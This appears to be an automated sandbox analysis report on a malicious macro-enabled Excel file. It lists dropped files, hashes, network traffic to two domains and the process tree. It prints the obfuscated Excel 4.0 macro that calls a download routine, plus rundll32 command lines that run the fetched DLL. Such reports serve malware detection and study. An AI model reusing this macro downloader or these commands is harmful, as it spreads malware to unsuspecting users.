                                                              Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type: ASCII text, with CRLF line terminators
                                                              Category: dropped
                                                              Size (bytes): 123
                                                              Entropy (8bit): 4.7468941332957
                                                              Encrypted: false
                                                              SSDEEP: 3:bDesBVomxWdadbqd2Oytdbqd2mxWdadbqd2v:bSsjuadbq0tdbqeadbqC
                                                              MD5: 4AED8272F2E9BAC97FF3A9E6AF7BACCF
                                                              SHA1: 2269919A7F51C40BEEF91C03FF2A05B9BA7E4381
                                                              SHA-256: 8867D925737F8D127394C4C8E267FF88EA4C75B8022A2F302490A696AB74031B
                                                              SHA-512: F6FF707EF00F3E0A4BD083A78F09020EE5DF8881D803B78773CBBE9125D528CEE47BBC857DF81D9B459F90FDAFED77F43F07785654B0CB37494215620B63A1A9
                                                              Malicious: false
                                                              Preview: [folders]..Desktop.LNK=0..[misc]..statistic-207394368.LNK=0..statistic-207394368.LNK=0..[misc]..statistic-207394368.LNK=0..
                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\statistic-207394368.LNK
                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:27:01 2020, mtime=Tue May 4 19:30:31 2021, atime=Tue May 4 19:30:31 2021, length=107618, window=hide
                                                              Category:dropped
                                                              Size (bytes):2236
                                                              Entropy (8bit):4.728041713389763
                                                              Encrypted:false
                                                              SSDEEP:48:8HnYc7pFohmnAZiB6pHnYc7pFohmnAZiB6:84cch8AZiK4cch8AZi
                                                              MD5:754469E430760EDD0FB35B864EBF3267
                                                              SHA1:AE7C965D1BBAB636733D9099298ED30AD2CA078E
                                                              SHA-256:A3538E0780B8C1363218C479716E203C41E9C07FEB4ECAF44A1738D377A93A7C
                                                              SHA-512:AFC7E8D9E1417740EB944F831A56B069B6889AA5F0AD31C9D1E0A44602E93BF48841CA5B856FE4004FB8C1E93D0858B945CC4FE6985410907AF7F5F9E220599E
                                                              Malicious:false
                                                              Preview: L..................F.... ......%>.....JT$A....HT$A..b............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.....................:.....Q...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....Z.1.....>Qc{..user..B.......N...R......S.....................W..e.n.g.i.n.e.e.r.....~.1.....>Qd{..Desktop.h.......N...R......Y..............>.....~.o.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....~.2......R. .STATIS~1.XLS..b......>Qa{.R......R........................s.t.a.t.i.s.t.i.c.-.2.0.7.3.9.4.3.6.8...x.l.s.m.......a...............-.......`...........>.S......C:\Users\user\Desktop\statistic-207394368.xlsm../.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.s.t.a.t.i.s.t.i.c.-.2.0.7.3.9.4.3.6.8...x.l.s.m.........:..,.LB.)...A}...`.......X.......579569...........!a..%.H.VZAj.......1........-$..!a..%.H.VZAj.......1........-$.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5
                                                              C:\Users\user\Desktop\33820000
                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):107618
                                                              Entropy (8bit):7.91601370112133
                                                              Encrypted:false
                                                              SSDEEP:1536:nmHTqPyl/yBO992hjPcQpWUot9ErjPX44sh0x13TQfDm:nl+yo9opH8x+3xs6ZQy
                                                              MD5:D297DF8319BBE1CBA66C1227F53BCDB1
                                                              SHA1:8B8B1C4ED555046028FACCB7BDD7F124A2B7FE5C
                                                              SHA-256:8BA1379D469ACF3184BABC90FC9C952C1B178E0EE9E470D5D1CE162D91DFF7FC
                                                              SHA-512:1595A1C66DFC5EB37017AA9A39FA234FD851EDF20121B84EEB5E85958AE58EED893814884768035FFF83C377A587F18647D4A4982E95803E6CA5670059D46E15
                                                              Malicious:false
                                                              Preview: .U.N.0.}G..".....j..]xd.`?....U..1.....P.*-.....s.3.^....!...e..U.W.u-.w.].d.&.0.A...rvz2._.......O)...e.V`..8.,|.".k.x.r):.......K.R.2..M..B<.T].hy.d...~o..T-.!.-E"...w$._,....%..C....H.4!jb.w.........{.m..wgD08N..CC....u.32......!./50j....FXr.....q9.~....fZ.a%.4.......s....=+..T2....'(.n.......:..A.u.|Z.....2.n<.h.U]..........>...6bZ..o.2..C............>.CE.%...x...}.4+o..H.8.x..'Y...AL...l..2.,?.....j.7/...?.......PK..........!.t...............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\Desktop\~$statistic-207394368.xlsm
                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):330
                                                              Entropy (8bit):1.6081032063576088
                                                              Encrypted:false
                                                              SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                              MD5:836727206447D2C6B98C973E058460C9
                                                              SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                              SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                              SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                              Malicious:true
                                                              Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                              C:\Users\user\jordji.nbvt11
                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type:HTML document, ASCII text
                                                              Category:dropped
                                                              Size (bytes):494
                                                              Entropy (8bit):4.962239405540505
                                                              Encrypted:false
                                                              SSDEEP:12:hnMQbwzRQ6QclfhxxEdWr+YZrH3atJMlgOt0quoQL:hMxRQspxCQnZrH3atEx0h
                                                              MD5:0357AA49EA850B11B99D09A2479C321B
                                                              SHA1:41472BA5C40F61FA1C77C42CF06248F13B8785F0
                                                              SHA-256:0FF0B7FCB090C65D0BDCB2AF4BBD2C30F33356B3CE9B117186FA20391EF840A3
                                                              SHA-512:A317A0F035B8DFF7CA60C76B0B75698A3528FD4C7C5E915292C982D2B38C1C937C318362C891E93BEE6FDB1B166764D7183140A837FD23DAA2BE3D2DAC5A5DFC
                                                              Malicious:false
                                                              Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <title>Contact Support</title>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">. </head>. <body marginwidth="0" marginheight="0" leftmargin="0" topmargin="0">. <iframe width="100%" height="100%" frameborder="0" SCROLLING="auto" marginwidth="0" src="http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4"></iframe>. </body>.</html>.

                                                              Static File Info

                                                              General

                                                              File type:Microsoft Excel 2007+
                                                              Entropy (8bit):7.917058358399405
                                                              TrID:
                                                              • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                              • ZIP compressed archive (8000/1) 16.67%
                                                              File name:statistic-207394368.xlsm
                                                              File size:109084
                                                              MD5:cd5e9899a7fa08e45309f4cf728bedf5
                                                              SHA1:a8671b54099e2d201660d220fc5652d3576bd5e6
                                                              SHA256:0465986113ca6df44638d99a67706662f7336e90c00d981666ba22217cefcfb5
                                                              SHA512:59c81e6bb9dee856614b4881d05f11f374f5d7dfab3bf9c2bc1495baa8a63ac93a8230420b722366f8d3dd718f7aa198250a89b5d1b94cc57a22b5c9d6095fec
                                                              SSDEEP:1536:cutuov3BiTr4GDgM+nG92hjPcQpWUot9E8cNcrAOJOerwzkFBHhr6vQnf+zy7fc:ckuocrZDKGopH8x+8HdoLqp6vif+zUk
                                                              File Content Preview:PK..........!.t...............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                              File Icon

                                                              Icon Hash:74ecd0e2f696908c

                                                              Static OLE Info

                                                              General

                                                              Document Type:OpenXML
                                                              Number of OLE Files:1

                                                              OLE File "statistic-207394368.xlsm"

                                                              Indicators

                                                              Has Summary Info:
                                                              Application Name:
                                                              Encrypted Document:
                                                              Contains Word Document Stream:
                                                              Contains Workbook/Book Stream:
                                                              Contains PowerPoint Document Stream:
                                                              Contains Visio Document Stream:
                                                              Contains ObjectPool Stream:
                                                              Flash Objects Count:
                                                              Contains VBA Macros:

                                                              Macro 4.0 Code

                                                              ,,,=HALT(),,,,,,,,,,,,"=4984654+9846544+468464=CALL(Sheet2!AY107&""n"",Sheet2!AY108&""A"",Sheet2!AY118,before.3.21.42.sheet!AR49,Sheet2!AT114,before.3.21.42.sheet!AT39,0,0)=CALL(Sheet2!AY107&""n"",Sheet2!AY108&""A"",Sheet2!AY118,before.3.21.42.sheet!AR49,Sheet2!AT115,before.3.21.42.sheet!AT39&""1"",0,0)",,,,,,,,,,,,,,,=Sheet2!AW142(),,,,,,,,,,,,,,,,,,,,,U,J,",D",..\jordji.nbvt1R,J,l,L,C,l,D,C,R,o,B,e,w,B,g,n,,i,l,,s,o,,t,a,,e,d,0,r,T,,S,o,,e,F,,r,i,,ve,l,,r,e,,,

                                                              Network Behavior

                                                              Network Port Distribution

                                                              TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 4, 2021 13:30:32.913629055 CEST | 49694 | 443 | 192.168.2.6 | 192.254.233.89
May 4, 2021 13:30:33.098670006 CEST | 443 | 49694 | 192.254.233.89 | 192.168.2.6
May 4, 2021 13:30:33.098889112 CEST | 49694 | 443 | 192.168.2.6 | 192.254.233.89
May 4, 2021 13:30:33.106025934 CEST | 49694 | 443 | 192.168.2.6 | 192.254.233.89
May 4, 2021 13:30:33.291604996 CEST | 443 | 49694 | 192.254.233.89 | 192.168.2.6
May 4, 2021 13:30:33.293154001 CEST | 443 | 49694 | 192.254.233.89 | 192.168.2.6
May 4, 2021 13:30:33.293171883 CEST | 443 | 49694 | 192.254.233.89 | 192.168.2.6
May 4, 2021 13:30:33.293188095 CEST | 443 | 49694 | 192.254.233.89 | 192.168.2.6
May 4, 2021 13:30:33.293281078 CEST | 49694 | 443 | 192.168.2.6 | 192.254.233.89
May 4, 2021 13:30:33.335212946 CEST | 49694 | 443 | 192.168.2.6 | 192.254.233.89
May 4, 2021 13:30:33.520991087 CEST | 443 | 49694 | 192.254.233.89 | 192.168.2.6
May 4, 2021 13:30:33.521300077 CEST | 49694 | 443 | 192.168.2.6 | 192.254.233.89
May 4, 2021 13:30:33.537909985 CEST | 49694 | 443 | 192.168.2.6 | 192.254.233.89
May 4, 2021 13:30:33.767009020 CEST | 443 | 49694 | 192.254.233.89 | 192.168.2.6
May 4, 2021 13:30:34.225502968 CEST | 443 | 49694 | 192.254.233.89 | 192.168.2.6
May 4, 2021 13:30:34.225538969 CEST | 443 | 49694 | 192.254.233.89 | 192.168.2.6
May 4, 2021 13:30:34.225799084 CEST | 49694 | 443 | 192.168.2.6 | 192.254.233.89
May 4, 2021 13:30:34.227082014 CEST | 49694 | 443 | 192.168.2.6 | 192.254.233.89
May 4, 2021 13:30:34.411990881 CEST | 443 | 49694 | 192.254.233.89 | 192.168.2.6
May 4, 2021 13:30:34.428113937 CEST | 49697 | 443 | 192.168.2.6 | 192.185.5.2
May 4, 2021 13:30:34.590596914 CEST | 443 | 49697 | 192.185.5.2 | 192.168.2.6
May 4, 2021 13:30:34.590920925 CEST | 49697 | 443 | 192.168.2.6 | 192.185.5.2
May 4, 2021 13:30:34.591828108 CEST | 49697 | 443 | 192.168.2.6 | 192.185.5.2
May 4, 2021 13:30:34.754307985 CEST | 443 | 49697 | 192.185.5.2 | 192.168.2.6
May 4, 2021 13:30:34.798787117 CEST | 443 | 49697 | 192.185.5.2 | 192.168.2.6
May 4, 2021 13:30:34.798830032 CEST | 443 | 49697 | 192.185.5.2 | 192.168.2.6
May 4, 2021 13:30:34.798846006 CEST | 443 | 49697 | 192.185.5.2 | 192.168.2.6
May 4, 2021 13:30:34.799097061 CEST | 49697 | 443 | 192.168.2.6 | 192.185.5.2
May 4, 2021 13:30:34.809848070 CEST | 49697 | 443 | 192.168.2.6 | 192.185.5.2
May 4, 2021 13:30:34.972557068 CEST | 443 | 49697 | 192.185.5.2 | 192.168.2.6
May 4, 2021 13:30:34.995088100 CEST | 443 | 49697 | 192.185.5.2 | 192.168.2.6
May 4, 2021 13:30:34.995203018 CEST | 49697 | 443 | 192.168.2.6 | 192.185.5.2
May 4, 2021 13:30:34.996277094 CEST | 49697 | 443 | 192.168.2.6 | 192.185.5.2
May 4, 2021 13:30:35.197578907 CEST | 443 | 49697 | 192.185.5.2 | 192.168.2.6
May 4, 2021 13:30:35.199228048 CEST | 443 | 49697 | 192.185.5.2 | 192.168.2.6
May 4, 2021 13:30:35.200345039 CEST | 49697 | 443 | 192.168.2.6 | 192.185.5.2
May 4, 2021 13:30:35.200406075 CEST | 49697 | 443 | 192.168.2.6 | 192.185.5.2
May 4, 2021 13:30:35.200413942 CEST | 49697 | 443 | 192.168.2.6 | 192.185.5.2
May 4, 2021 13:30:35.205187082 CEST | 49699 | 443 | 192.168.2.6 | 192.185.5.2
May 4, 2021 13:30:35.365602016 CEST | 443 | 49697 | 192.185.5.2 | 192.168.2.6
May 4, 2021 13:30:35.366038084 CEST | 443 | 49699 | 192.185.5.2 | 192.168.2.6
May 4, 2021 13:30:35.366206884 CEST | 49699 | 443 | 192.168.2.6 | 192.185.5.2
May 4, 2021 13:30:35.366786957 CEST | 49699 | 443 | 192.168.2.6 | 192.185.5.2
May 4, 2021 13:30:35.527796030 CEST | 443 | 49699 | 192.185.5.2 | 192.168.2.6
May 4, 2021 13:30:35.527837038 CEST | 443 | 49699 | 192.185.5.2 | 192.168.2.6
May 4, 2021 13:30:35.527909040 CEST | 49699 | 443 | 192.168.2.6 | 192.185.5.2
May 4, 2021 13:30:35.528770924 CEST | 49699 | 443 | 192.168.2.6 | 192.185.5.2
May 4, 2021 13:30:35.532295942 CEST | 49699 | 443 | 192.168.2.6 | 192.185.5.2
May 4, 2021 13:30:35.690968990 CEST | 443 | 49699 | 192.185.5.2 | 192.168.2.6
May 4, 2021 13:30:35.839540958 CEST | 443 | 49699 | 192.185.5.2 | 192.168.2.6
May 4, 2021 13:30:35.839566946 CEST | 443 | 49699 | 192.185.5.2 | 192.168.2.6
May 4, 2021 13:30:35.839628935 CEST | 49699 | 443 | 192.168.2.6 | 192.185.5.2
May 4, 2021 13:30:35.839665890 CEST | 49699 | 443 | 192.168.2.6 | 192.185.5.2
May 4, 2021 13:30:35.840308905 CEST | 49699 | 443 | 192.168.2.6 | 192.185.5.2
May 4, 2021 13:30:36.000338078 CEST | 443 | 49699 | 192.185.5.2 | 192.168.2.6

                                                              UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 4, 2021 13:30:14.931613922 CEST | 55673 | 53 | 192.168.2.6 | 8.8.8.8
May 4, 2021 13:30:14.981534004 CEST | 53 | 55673 | 8.8.8.8 | 192.168.2.6
May 4, 2021 13:30:16.589236975 CEST | 57773 | 53 | 192.168.2.6 | 8.8.8.8
May 4, 2021 13:30:16.637959957 CEST | 53 | 57773 | 8.8.8.8 | 192.168.2.6
May 4, 2021 13:30:17.535780907 CEST | 59986 | 53 | 192.168.2.6 | 8.8.8.8
May 4, 2021 13:30:17.584537029 CEST | 53 | 59986 | 8.8.8.8 | 192.168.2.6
May 4, 2021 13:30:18.639148951 CEST | 52478 | 53 | 192.168.2.6 | 8.8.8.8
May 4, 2021 13:30:18.703768969 CEST | 53 | 52478 | 8.8.8.8 | 192.168.2.6
May 4, 2021 13:30:20.692650080 CEST | 58931 | 53 | 192.168.2.6 | 8.8.8.8
May 4, 2021 13:30:20.742396116 CEST | 53 | 58931 | 8.8.8.8 | 192.168.2.6
May 4, 2021 13:30:24.285886049 CEST | 57725 | 53 | 192.168.2.6 | 8.8.8.8
May 4, 2021 13:30:24.343310118 CEST | 53 | 57725 | 8.8.8.8 | 192.168.2.6
May 4, 2021 13:30:26.451653004 CEST | 49283 | 53 | 192.168.2.6 | 8.8.8.8
May 4, 2021 13:30:26.501336098 CEST | 53 | 49283 | 8.8.8.8 | 192.168.2.6
May 4, 2021 13:30:27.833035946 CEST | 58377 | 53 | 192.168.2.6 | 8.8.8.8
May 4, 2021 13:30:27.881871939 CEST | 53 | 58377 | 8.8.8.8 | 192.168.2.6
May 4, 2021 13:30:32.843764067 CEST | 55074 | 53 | 192.168.2.6 | 8.8.8.8
May 4, 2021 13:30:32.900943995 CEST | 53 | 55074 | 8.8.8.8 | 192.168.2.6
May 4, 2021 13:30:32.944375038 CEST | 54513 | 53 | 192.168.2.6 | 8.8.8.8
May 4, 2021 13:30:33.004096985 CEST | 53 | 54513 | 8.8.8.8 | 192.168.2.6
May 4, 2021 13:30:33.904851913 CEST | 62044 | 53 | 192.168.2.6 | 8.8.8.8
May 4, 2021 13:30:33.955986977 CEST | 53 | 62044 | 8.8.8.8 | 192.168.2.6
May 4, 2021 13:30:34.244324923 CEST | 63791 | 53 | 192.168.2.6 | 8.8.8.8
May 4, 2021 13:30:34.425299883 CEST | 53 | 63791 | 8.8.8.8 | 192.168.2.6
May 4, 2021 13:30:34.840548992 CEST | 64267 | 53 | 192.168.2.6 | 8.8.8.8
May 4, 2021 13:30:34.891115904 CEST | 53 | 64267 | 8.8.8.8 | 192.168.2.6
May 4, 2021 13:30:35.767070055 CEST | 49448 | 53 | 192.168.2.6 | 8.8.8.8
May 4, 2021 13:30:35.817197084 CEST | 53 | 49448 | 8.8.8.8 | 192.168.2.6
May 4, 2021 13:30:39.763974905 CEST | 60342 | 53 | 192.168.2.6 | 8.8.8.8
May 4, 2021 13:30:39.825874090 CEST | 53 | 60342 | 8.8.8.8 | 192.168.2.6
May 4, 2021 13:30:40.689188957 CEST | 61346 | 53 | 192.168.2.6 | 8.8.8.8
May 4, 2021 13:30:40.738027096 CEST | 53 | 61346 | 8.8.8.8 | 192.168.2.6
May 4, 2021 13:30:41.590186119 CEST | 51774 | 53 | 192.168.2.6 | 8.8.8.8
May 4, 2021 13:30:41.640290976 CEST | 53 | 51774 | 8.8.8.8 | 192.168.2.6
May 4, 2021 13:30:42.526679993 CEST | 56023 | 53 | 192.168.2.6 | 8.8.8.8
May 4, 2021 13:30:42.576664925 CEST | 53 | 56023 | 8.8.8.8 | 192.168.2.6
May 4, 2021 13:30:43.312807083 CEST | 58384 | 53 | 192.168.2.6 | 8.8.8.8
May 4, 2021 13:30:43.365963936 CEST | 53 | 58384 | 8.8.8.8 | 192.168.2.6
May 4, 2021 13:31:10.071494102 CEST | 60261 | 53 | 192.168.2.6 | 8.8.8.8
May 4, 2021 13:31:10.123071909 CEST | 53 | 60261 | 8.8.8.8 | 192.168.2.6
May 4, 2021 13:31:50.820354939 CEST | 56061 | 53 | 192.168.2.6 | 8.8.8.8
May 4, 2021 13:31:50.884865046 CEST | 53 | 56061 | 8.8.8.8 | 192.168.2.6

                                                              DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 4, 2021 13:30:32.843764067 CEST | 192.168.2.6 | 8.8.8.8 | 0x3362 | Standard query (0) | industrialarttextile.com | A (IP address) | IN (0x0001)
May 4, 2021 13:30:34.244324923 CEST | 192.168.2.6 | 8.8.8.8 | 0x99c1 | Standard query (0) | anaheimdermatologists.com | A (IP address) | IN (0x0001)

                                                              DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 4, 2021 13:30:32.900943995 CEST | 8.8.8.8 | 192.168.2.6 | 0x3362 | No error (0) | industrialarttextile.com | (none) | 192.254.233.89 | A (IP address) | IN (0x0001)
May 4, 2021 13:30:34.425299883 CEST | 8.8.8.8 | 192.168.2.6 | 0x99c1 | No error (0) | anaheimdermatologists.com | (none) | 192.185.5.2 | A (IP address) | IN (0x0001)

HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
May 4, 2021 13:30:33.293188095 CEST | 192.254.233.89 | 443 | 192.168.2.6 | 49694 | CN=mail.gdmart.com.bd | CN=R3, O=Let's Encrypt, C=US | Wed Mar 10 10:47:11 CET 2021 | Tue Jun 08 11:47:11 CEST 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19
(chain cert, same connection) | | | | | CN=R3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021 | |
May 4, 2021 13:30:34.798846006 CEST | 192.185.5.2 | 443 | 192.168.2.6 | 49697 | CN=cpcalendars.anaheimdermatologists.com | CN=R3, O=Let's Encrypt, C=US | Wed Mar 17 22:18:32 CET 2021 | Tue Jun 15 23:18:32 CEST 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19
(chain cert, same connection) | | | | | CN=R3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021 | |

                                                              Code Manipulations

Statistics

CPU Usage (chart not reproduced)

Memory Usage (chart not reproduced)

High Level Behavior Distribution (chart not reproduced)

Behavior (chart not reproduced)

System Behavior

General

Start time: 13:30:25
Start date: 04/05/2021
Path: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase: 0xad0000
File size: 27110184 bytes
MD5 hash: 5D6638F2C8F8571C593999C58866007E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 13:30:35
Start date: 04/05/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32 ..\jordji.nbvt1,DllRegisterServer
Imagebase: 0xd0000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 13:30:36
Start date: 04/05/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32 ..\jordji.nbvt11,DllRegisterServer
Imagebase: 0xd0000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                              Disassembly

                                                              Code Analysis
